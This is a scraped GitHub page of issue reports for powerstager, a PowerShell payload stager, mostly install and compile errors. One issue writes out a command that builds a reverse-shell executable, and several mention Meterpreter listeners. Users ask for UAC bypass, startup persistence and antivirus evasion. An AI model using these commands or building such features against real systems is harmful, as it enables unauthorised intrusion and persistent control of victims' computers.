z0noxz / powerstager Goto Github PK
View Code? Open in Web Editor NEWA payload stager using PowerShell
License: MIT License
A payload stager using PowerShell
License: MIT License
error show up
:
Traceback (most recent call last):
File "/usr/lib/python3.5/runpy.py", line 193, in _run_module_as_main
"main", mod_spec)
File "/usr/lib/python3.5/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/root/tools/powerstager/powerstager/powerstager.py", line 19, in
import names
ImportError: No module named 'names'
allow hostnames to be added in lhost variable .
Can you automatically attempt to elevate privileges using the PowerShell empire bypassuac module and adding a register start up.
In the effort to make the payload as stable as possible and to avoid touching the disk.
Thanks
creating a 32bit exe with command :
powerstager -t win32 -o test.exe -m --lhost (myip) --lport (my listening port)
and running the exe in windows xp 32bit , the file does not establish a connection to the source .
Can you add support for PowerShell empire stagers.
github.com/EmpireProject/Empire
Thanks
root@pc: /Desktop/gittools/powerstager#._`
/setup.py install
Traceback (most recent call last):
File "./setup.py", line 2, in <module
from setuptools import setup
ImportError: No module named 'setuptools'
i check the code and it seems setup.py requires a folder setuptools
but there is no setuptools in your repos.
Hi , i created an exe with your script , and i installed specifically windows 7 to test it out .
The exe is 32bit , and this w7 is also 32bit .
Before this video i opened metasploit console with a listener script but it was unable to gt any connection from this station .
This exe was supposedly to connect to an ip on my local network , and i checked if powershell was installed .
I used tcpview to monitor the outside connection to see if the Exe was trying to connect to my lan ip , but it looks that exe crashes on there is anything wrong on the payload .
i created a video .
On this video there will be a black space , this happened when windows asked me to run app as administrator , but camstudio was unable to catch that .
Let me know if you are aware of this issue , and let me know if you need dome tests from here to check it out what is happening .
here it is the video : https://www.youtube.com/watch?v=vZoSZ7GAH18
I notice that you updated recently powerstager , i install it and it is poping an error .
I believe this error may be related to the c code that mingw will have to compile .
VNDL52CWI2.c: In function ‘main’:
VNDL52CWI2.c:16:2: error: ‘for’ loop initial declarations are only allowed in C99 or C11 mode
for (int _eSprfFF = 0; _eSprfFF < sizeof(_iVIzZpBrbO) / sizeof(_iVIzZpBrbO[0]); _eSprfFF++)
^
VNDL52CWI2.c:16:2: note: use option -std=c99, -std=gnu99, -std=c11 or -std=gnu11 to compile your code
VNDL52CWI2.c:26:11: error: redefinition of ‘_eSprfFF’
for (int _eSprfFF = 0; _eSprfFF < sizeof(_WLhBZbZQhea) / sizeof(_WLhBZbZQhea[0]); _eSprfFF++)
^
VNDL52CWI2.c:16:11: note: previous definition of ‘_eSprfFF’ was here
for (int _eSprfFF = 0; _eSprfFF < sizeof(_iVIzZpBrbO) / sizeof(_iVIzZpBrbO[0]); _eSprfFF++)
^
VNDL52CWI2.c:26:2: error: ‘for’ loop initial declarations are only allowed in C99 or C11 mode
for (int _eSprfFF = 0; _eSprfFF < sizeof(_WLhBZbZQhea) / sizeof(_WLhBZbZQhea[0]); _eSprfFF++)
[i] Shell listener : 1.1.1.1:1111
[i] Output : power.exe
[i] Target : win32
[i] Temp file : _yAzyjcr
[i] Encryption key : tAyOLIJYBKRN8xnc0dJjESK12
[i] Payload size : 1754 bytes
[i] Embedded size : 8584 bytes
[-] Failed to generate : power.exe
I have tried "Local-Spawn-Meterpreter", so many times and listened on msfconsole and set a payload to "windows/meterpreter/reverse_tcp", but i cannot receive any connection from a victim computer. Am i missing something? or should i set a different payload to use that module? Could you help me with this if you have time?
first thanks for this great job, but i wonder witch type of powershell payload i choose with youe script!! .bat or .ps1 or just string.txt or what!! thanks
i get the error: mingw is not installed on your system.
yet i have it installed
got this error :
/ _ \_____ _____ _ __/ _\ |_ __ _ __ _ ___ _ __
/ /)/ _ \ \ /\ / / _ \ '_\ | / _ |/ _
|/ _ \ '|
/ / () \ V V / __/ | \ \ || (| | (| | / |
/ _/ _/_/ _|| _/__,|_, |___||
_ __ _ _ |/
| ' | | | |
| |) | || | A payload stager using PowerShell
() ./ _, | Created by z0noxz
|| |_/
Traceback (most recent call last):
File "power.py", line 2962, in
main(sys.argv[1:])
File "power.py", line 2949, in main
compile_source()
File "power.py", line 2694, in compile_source
Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info)
IOError: [Errno 2] No such file or directory: 'windowsbd'
with gcc-mingw-w64-i686 version 8.3.0
after downgrading to 4.9.1 version in debian jessie repository the problem disapeared .
your script requires all these packages
gcc-mingw-w64-i686
gcc-mingw-w64-x86-64
binutils-mingw-w64-i686
binutils-mingw-w64-x86-64
and right now it will only work if these packages came from jessie repository .
As of April 9, 2018... Antivirus now seems to pick up this payload. Any fix? Any way to change the internals so that the payload looks different to AV?.. Thank you... Absolutely love this generator! I came up with this idea myself once. I was glad to find it here, already made! I might HAVE to make it myself, now.
Hi , i am just passing by to tell you that your python tool "powerstager" was implemented in fatrat at :
https://github.com/Screetsec/TheFatRat/
We added you in the credits of fatrat script and your github link in our readme.md .
Thanks for your excellent work on this tool .
Tried to run on latest W10 build but did not appear to work. So have tried running .ps1 locally as Admin and causes Powershell to crash..
Tried W32 & w64
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.